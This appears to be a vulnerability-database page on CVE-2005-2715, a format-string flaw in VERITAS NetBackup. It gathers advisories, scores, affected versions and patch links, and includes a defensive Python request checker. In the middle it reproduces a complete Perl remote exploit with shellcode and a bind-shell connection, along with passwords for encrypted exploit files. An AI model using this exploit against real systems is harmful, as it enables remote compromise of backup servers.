CVE-2005-2715
CVSS 10.0
Published: 2005-10-12 18:02:00
Revised: 2008-09-05 16:52:30

[Original] Format string vulnerability in the Java user interface service (bpjava-msvc) daemon for VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and NetBackup Enterprise/Server/Client 5.0, 5.1, and 6.0, allows remote attackers to execute arbitrary code via the COMMAND_LOGON_TO_MSERVER command.


[CNNVD] Veritas NetBackup Data 'COMMAND_LOGON_TO_MSERVER' Command String Handling Vulnerability (CNNVD-200510-073)

Veritas NetBackup is a large-scale data backup application system.
The bpjava-msvc daemon in VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and in NetBackup Enterprise/Server/Client 5.0, 5.1 and 6.0, does not correctly handle format string data passed via the COMMAND_LOGON_TO_MSERVER command, allowing attackers to execute arbitrary code remotely.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:symantec_veritas:netbackup_enterprise_server_client:5.1
cpe:/a:symantec_veritas:netbackup_data_and_business_center:4.5fp
cpe:/a:symantec_veritas:netbackup_enterprise_server_client:6.0
cpe:/a:symantec_veritas:netbackup_enterprise_server_client:5.0
cpe:/a:symantec_veritas:netbackup_data_and_business_center:4.5mp

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2715
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2715
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-073
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/495556
(PATCH)  CERT-VN  VU#495556
http://www.symantec.com/avcenter/security/Content/2005.10.12.html
(VENDOR_ADVISORY)  CONFIRM  http://www.symantec.com/avcenter/security/Content/2005.10.12.html
http://www.securityfocus.com/bid/15079
(PATCH)  BID  15079
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102054-1
(PATCH)  SUNALERT  102054
http://seer.support.veritas.com/docs/279085.htm
(PATCH)  CONFIRM  http://seer.support.veritas.com/docs/279085.htm
http://securitytracker.com/id?1015028
(PATCH)  SECTRACK  1015028
http://secunia.com/advisories/17181
(VENDOR_ADVISORY)  SECUNIA  17181
http://www.zerodayinitiative.com/advisories/ZDI-05-001.html
(VENDOR_ADVISORY)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-05-001.html

- Vulnerability information

Veritas NetBackup Data 'COMMAND_LOGON_TO_MSERVER' Command String Handling Vulnerability
Severity: Critical   Type: Format string
Published: 2005-10-12 00:00:00   Updated: 2007-02-02 00:00:00
Access: Remote

- Advisories and patches

The vendor has released an upgrade patch that fixes this security issue; it can be obtained from:
http://www.symantec.com/avcenter/security/Content/2005.10.12.html

- Vulnerability information (1263)

Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux) (EDBID:1263)
Platform: multiple   Type: remote
Date: 2005-10-20   Verified
Port: 13722   Author: Kevin Finisterre
#!/usr/bin/perl
##############################################################
# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
##############################################################

use POSIX;
use IO::Socket;
use IO::Select;
use strict;

print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n";

if ($#ARGV == -1) {
        print "Usage:\n\t$0 <hostname> <port>\n\n";
        exit (1);
}

my $hostName = $ARGV[0];
my $port = $ARGV[1] || 13722;

buildexploit ($hostName, $port);

my $shellport = 5570;
print "[*] Connect to remote shell port\n";
my $sock = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $hostName,
                PeerPort => $shellport,
                Type => SOCK_STREAM
);

if (! $sock)
{
        print "[*] Error, Seems Failed\n";
        exit (0);
}

print "[*] G0t R00T\n";

StartShell ($sock);

sub buildexploit
{
        my ($host, $port) = @_;
        my $s = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $host,
                PeerPort => $port,
                Type => SOCK_STREAM
        );

        if (! $s)
        {
                print "[*] Could not create socket: $!\n";
                exit(0);
        }

        print $s " 118      1\nOWNED BABY\n";
        print scalar <$s>;
        print scalar <$s>;

        my $shellcode = "\x90" x 500 .
        "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\x13\x99".
        "\x37\xe2\x83\xeb\xfc\xe2\xf4\x22\x42\xc0\x01\xa3\xff\x64\xa1\x40".
        "\xda\x64\x6b\xf2\xd2\xfa\x62\x9a\x5e\x65\x84\x7b\x8c\xf5\xa1\x75".
        "\xca\xbe\x03\xa3\x89\x67\xb3\x44\x10\xd6\x52\x75\x54\xb7\x52\x75".
        "\x2a\x33\x2f\x93\xc9\x67\xb5\x9a\x78\x74\x52\x75\x54\xb7\x6b\xca".
        "\x10\xf4\x52\x2c\xd0\xfa\x62\x52\x7b\xcf\xb3\x7b\xf7\x18\x91\x7b".
        "\xf1\x18\xcd\x71\xf0\xbe\x01\x42\xca\xbe\x03\xa3\x92\xfa\x62";
        my $retloc = 0x080b50ec; #0x080b53b4;
        my $retaddr = 0x80e0658; # can't use shellcode in stack.
        my $hi = ($retaddr >> 0) & 0xffff;
        my $lo = ($retaddr >> 16) & 0xffff;

        $hi = $hi - 0x28;
        $lo = (0x10000 + $lo + 0x28) - $hi - 0x50;

        my $align = 3;
        my $buffer = " 101      6\n" . "a" x $align . pack ('l', $retloc) .  pack ('l', $retloc + 2) .
        "%." . $hi . "lx" . "%1694\$hn" .
        "%." . $lo . "lx" . "%1695\$hn" .
        $shellcode . "\n" .
        $shellcode . "\n" .
        "i\n" . "0wned\n" . "y0u\n".
        "boot.ini\n" . "\n";

        print STDERR "Sending " .length($buffer) . " bytes to remote\n";
        sleep (10);
        print $s $buffer;
        print scalar <$s>;

        close $s;
}

sub StartShell
{
        my ($client) = @_;
        my $sel = IO::Select->new();

        # unbuffered fun.
        Unblock(*STDIN);
        Unblock(*STDOUT);
        Unblock($client);

        select($client); $|++;
        select(STDIN);   $|++;
        select(STDOUT);  $|++;

        $sel->add($client);
        $sel->add(*STDIN);

        while (fileno($client))
        {
                my $fd;
                my @fds = $sel->can_read(1);

                foreach $fd (@fds)
                {
                        my $in = <$fd>;
                        if (! $in || ! $fd || ! $client)
                        {
                                print "[*] Closing connection.\n";
                                close($client);
                                exit(0);
                        }

                        if ($fd eq $client)
                        {
                                print STDOUT $in;
                        } else {
                                print $client $in;
                        }
                }
        }
        close ($client);
        exit (0);
}

sub Unblock {
        my $fd = shift;
        my $flags;
        $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
        fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}

# milw0rm.com [2005-10-20]

- Vulnerability information (F40683)

Zero Day Initiative Advisory 05-01 (PacketStormID:F40683)
Date: 2005-10-13 00:00:00
Authors: ZDI, Tipping Point   Site: zerodayinitiative.com
Tags: advisory, remote, arbitrary, code execution
CVE-2005-2715

ZDI-05-001: VERITAS NetBackup Remote Code Execution - This vulnerability allows remote attackers to execute arbitrary code on vulnerable NetBackup installations.

ZDI-05-001: VERITAS NetBackup Remote Code Execution
http://www.zerodayinitiative.com/advisories/ZDI-05-001.html
October 12th, 2005

-- CVE ID:
CAN-2005-2715

-- Affected Vendor:
Symantec VERITAS

-- Affected Products:
VERITAS NetBackup Data and Business Center 4.5FP
VERITAS NetBackup Data and Business Center 4.5MP
VERITAS NetBackup Enterprise/Server/Client 5.0
VERITAS NetBackup Enterprise/Server/Client 5.1
VERITAS NetBackup Enterprise/Server/Client 6.0

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since September 15th, 2005 by Digital Vaccine protection
filter ID 3766. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable NetBackup installations. Authentication is not required to
exploit this vulnerability.

This specific flaw exists within the bpjava-msvc daemon due to incorrect
handling of format string data passed through the
'COMMAND_LOGON_TO_MSERVER' command. The vulnerable daemon listens on
TCP port 13722 and affects both NetBackup clients and servers.

-- Vendor Response:
Symantec Engineers have verified this issue and made security updates
available for the supported VERITAS NetBackup products. Symantec
strongly recommends all customers immediately apply the latest updates
for their supported product versions to protect against these types of
threats. Please refer to the Symantec advisory for update information:

    http://www.symantec.com/avcenter/security/Content/2005.10.12.html

-- Disclosure Timeline:
2005.09.12 - Vulnerability reported to vendor
2005.09.15 - Digital Vaccine released to TippingPoint customers
2005.10.11 - Vulnerability information provided to ZDI security partners
2005.10.12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Kevin Finisterre with exploitation
assistance from JohnH.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product. 
    

- Vulnerability information

19949
VERITAS NetBackup bpjava-msvc Daemon Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Private, Exploit Commercial Vendor Verified

- Description

- Timeline

2005-10-12 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Veritas has released a patch to address this vulnerability.

- References

- Credit

Unknown or Incomplete

- Vulnerability information

VERITAS NetBackup Java User-Interface Remote Format String Vulnerability
Class: Input Validation Error   BID: 15079
Remote: Yes   Local: No
Published: 2005-10-12 12:00:00   Updated: 2007-11-01 10:26:00
Credit: Discovered by Kevin Finisterre with assistance from JohnH.

- Vulnerable versions

Veritas Software NetBackup Server 6.0
Veritas Software NetBackup Server 5.1
Veritas Software NetBackup Server 5.1
Veritas Software NetBackup Server 5.0
Veritas Software NetBackup Server 5.0
Veritas Software NetBackup Server 3.4
Veritas Software NetBackup Global Data Manager 5.0
Veritas Software NetBackup Global Data Manager 4.5 MP4
Veritas Software NetBackup Global Data Manager 4.5 MP3
Veritas Software NetBackup Global Data Manager 4.5 MP2
Veritas Software NetBackup Global Data Manager 4.5 MP1
Veritas Software NetBackup Global Data Manager 4.5 FP4
Veritas Software NetBackup Global Data Manager 4.5 FP3
Veritas Software NetBackup Global Data Manager 4.5 FP2
Veritas Software NetBackup Global Data Manager 4.5 FP1
Veritas Software NetBackup Global Data Manager 4.5
Veritas Software NetBackup for NetWare Media Servers 5.1 MP3
Veritas Software NetBackup for NetWare Media Servers 5.1 MP2
Veritas Software NetBackup for NetWare Media Servers 5.1 MP1
Veritas Software NetBackup for NetWare Media Servers 5.1
Veritas Software NetBackup for NetWare Media Servers 5.0 MP5
Veritas Software NetBackup for NetWare Media Servers 5.0 MP4
Veritas Software NetBackup for NetWare Media Servers 5.0 MP3
Veritas Software NetBackup for NetWare Media Servers 5.0 MP2
Veritas Software NetBackup for NetWare Media Servers 5.0 MP1
Veritas Software NetBackup for NetWare Media Servers 5.0
Veritas Software NetBackup for NetWare Media Servers 4.5 MP8
Veritas Software NetBackup for NetWare Media Servers 4.5 MP7
Veritas Software NetBackup for NetWare Media Servers 4.5 MP6
Veritas Software NetBackup for NetWare Media Servers 4.5 MP5
Veritas Software NetBackup for NetWare Media Servers 4.5 MP4
Veritas Software NetBackup for NetWare Media Servers 4.5 MP3
Veritas Software NetBackup for NetWare Media Servers 4.5 MP2
Veritas Software NetBackup for NetWare Media Servers 4.5 MP1
Veritas Software NetBackup for NetWare Media Servers 4.5 FP8
Veritas Software NetBackup for NetWare Media Servers 4.5 FP7
Veritas Software NetBackup for NetWare Media Servers 4.5 FP6
Veritas Software NetBackup for NetWare Media Servers 4.5 FP5
Veritas Software NetBackup for NetWare Media Servers 4.5 FP4
Veritas Software NetBackup for NetWare Media Servers 4.5 FP3
Veritas Software NetBackup for NetWare Media Servers 4.5 FP2
Veritas Software NetBackup for NetWare Media Servers 4.5 FP1
Veritas Software NetBackup for NetWare Media Servers 4.5
Veritas Software NetBackup Enterprise Server 6.0
Veritas Software NetBackup Enterprise Server 5.1
Veritas Software NetBackup Enterprise Server 5.0
Veritas Software NetBackup DataCenter 5.0
Veritas Software NetBackup DataCenter 4.5 MP
Veritas Software NetBackup DataCenter 4.5 FP
Veritas Software NetBackup DataCenter 4.5
Veritas Software NetBackup DataCenter 3.4
Veritas Software NetBackup Client 6.0
Veritas Software NetBackup Client 5.1
Veritas Software NetBackup Client 5.0
Veritas Software NetBackup BusinesServer 4.5 MP
Veritas Software NetBackup BusinesServer 4.5 FP
Veritas Software NetBackup BusinesServer 4.5
Veritas Software NetBackup BusinesServer 3.4
Veritas Software NetBackup Advanced Reporter 4.5 MP4
Veritas Software NetBackup Advanced Reporter 4.5 MP3
Veritas Software NetBackup Advanced Reporter 4.5 MP2
Veritas Software NetBackup Advanced Reporter 4.5 MP1
Veritas Software NetBackup Advanced Reporter 4.5 FP4
Veritas Software NetBackup Advanced Reporter 4.5 FP3
Veritas Software NetBackup Advanced Reporter 4.5 FP2
Veritas Software NetBackup Advanced Reporter 4.5 FP1
Veritas Software NetBackup Advanced Reporter 4.5
Veritas Software NetBackup DataCenter for Windows 4.5 MP
Veritas Software NetBackup BusinesServer for Windows 4.5 MP

- Not vulnerable versions

Veritas Software NetBackup DataCenter for Windows 4.5 MP
Veritas Software NetBackup BusinesServer for Windows 4.5 MP

- Discussion

NetBackup Java user interface is affected by a remote format-string vulnerability.

An attacker can exploit this vulnerability by crafting a malicious request that contains format specifiers. A successful attack may crash the server or lead to arbitrary code execution. This may facilitate unauthorized access or privilege escalation with SYSTEM or superuser privileges.
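As a defender-side illustration of the flaw described in the ZDI "Vulnerability Details" section and in the discussion above, here is an added example, not code from this page, from VERITAS/Symantec or from any of the cited advisories: a small Python checker that classifies the printf-style conversions found in the newline-separated fields of a request captured on the bpjava-msvc port, so a monitoring hook or a regression test can flag format-string content before it ever reaches a format argument. The request framing, the field layout and the sample requests are assumptions constructed for the example; the high-risk samples reuse the %.Nlx / %N$hn shape that appears in the exploit reproduced above.

```python
import re

# printf-style conversion: %[argpos$][flags][width][.precision][length]conv
# Group 1 captures a positional "N$" prefix, group 2 the conversion character.
FMT_SPEC = re.compile(
    r"%(?:(\d+)\$)?[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?"
    r"(?:hh|h|ll|l|L|q|j|z|t)?([diouxXeEfFgGaAcspn%])"
)


def classify_field(value: str) -> dict:
    """Count the printf conversions in one request field.
    '%n' turns a format-string bug into a memory write and positional '%N$'
    references pick the stack slot, so both are reported as high risk.
    printf's space flag means '50% off' also matches ('% o'), exactly as the
    C library would read it, which is the right call for this check.
    """
    specs = [(pos, conv) for pos, conv in FMT_SPEC.findall(value) if conv != "%"]
    positional = sum(1 for pos, _ in specs if pos)
    writes = sum(1 for _, conv in specs if conv == "n")
    return {
        "specifiers": len(specs),
        "positional": positional,
        "write_specifiers": writes,
        "suspicious": bool(specs),
        "high_risk": writes > 0 or positional > 0,
    }


def inspect_request(payload: bytes) -> str:
    """Return 'allow', 'alert' or 'block' for one captured request.
    Framing is assumed for illustration: a header line, then newline-
    terminated fields such as user name and password.  Any conversion in a
    field raises an alert; '%n' or positional references block outright.
    """
    verdict = "allow"
    for field in payload.decode("latin-1").split("\n"):
        result = classify_field(field)
        if result["high_risk"]:
            return "block"
        if result["suspicious"]:
            verdict = "alert"
    return verdict


# Constructed sample requests, not real captures.
BENIGN_LOGON = b" 101      6\nbackup-admin\nS3cret!\n"
LEAK_PROBE = b" 101      6\nuser%x%x%x\nS3cret!\n"            # reads stack slots
WRITE_PRIMITIVE = b" 101      6\naaa%.2000lx%7$hn\nS3cret!\n"  # %n-style write
```

The check is a compensating control only; the actual fix is the vendor patch, which stops passing client-supplied data as the format argument.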

- Exploit

Exploits for Windows, Linux, and Mac OS X platforms have been supplied by <johnh@digitalmunition.com> & <kf@digitalmunition.com>.

VERITAS-Linux.pl.gpg:

pass: allaroundthemulberrybush

VERITAS-OSX.pl.gpg:

pass: themonkeychasedtheweasel

VERITAS-WIN32.pl.gpg:

pass: apennyforaneedle

The following exploit is available to members of the Immunity Partner's Program:

https://www.immunityinc.com/downloads/immpartners/netbackup_javaui.tgz

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

Fixes are available.

Veritas Software NetBackup DataCenter 4.5 FP
Veritas Software NetBackup DataCenter 4.5 MP
Veritas Software NetBackup BusinesServer 4.5 FP
Veritas Software NetBackup BusinesServer 4.5 MP
Veritas Software NetBackup Enterprise Server 5.0
Veritas Software NetBackup Server 5.0
Veritas Software NetBackup Server 5.0
Veritas Software NetBackup Enterprise Server 5.1
Veritas Software NetBackup Server 5.1
Veritas Software NetBackup Server 5.1
Veritas Software NetBackup Server 6.0
Veritas Software NetBackup Enterprise Server 6.0

- References
